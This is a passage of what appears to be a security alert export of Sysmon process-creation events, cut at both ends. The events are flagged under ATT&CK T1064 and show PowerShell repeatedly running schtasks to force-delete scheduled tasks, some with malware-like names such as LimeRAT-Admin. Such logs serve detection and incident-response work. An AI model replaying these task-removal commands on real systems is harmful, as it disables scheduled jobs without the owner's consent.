-NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.693"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-00102d0a1a00}"",""processId"":""4976"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.962",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.667 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001092081a00} +ProcessId: 7260 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams 
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.669910600Z"",""eventRecordID"":""2257"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.667\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001092081a00}\r\nProcessId: 7260\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.667"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001092081a00}"",""processId"":""7260"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.946",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.641 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001002071a00} +ProcessId: 8148 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.645347900Z"",""eventRecordID"":""2256"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.641\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001002071a00}\r\nProcessId: 8148\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN 
LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.641"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001002071a00}"",""processId"":""8148"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:18:05.930",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.621 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001073051a00} +ProcessId: 8072 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.623453600Z"",""eventRecordID"":""2255"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.621\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001073051a00}\r\nProcessId: 8072\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.621"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001073051a00}"",""processId"":""8072"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.900",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.600 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010dd031a00} +ProcessId: 7988 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.602160000Z"",""eventRecordID"":""2254"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.600\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010dd031a00}\r\nProcessId: 7988\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.600"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010dd031a00}"",""processId"":""7988"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.884",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.579 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-00104e021a00} +ProcessId: 7892 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.581662500Z"",""eventRecordID"":""2253"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.579\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-00104e021a00}\r\nProcessId: 7892\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:37.579"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-00104e021a00}"",""processId"":""7892"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.868",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.558 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010bf001a00} +ProcessId: 7840 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.561246000Z"",""eventRecordID"":""2252"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.558\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010bf001a00}\r\nProcessId: 7840\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.558"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010bf001a00}"",""processId"":""7840"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John 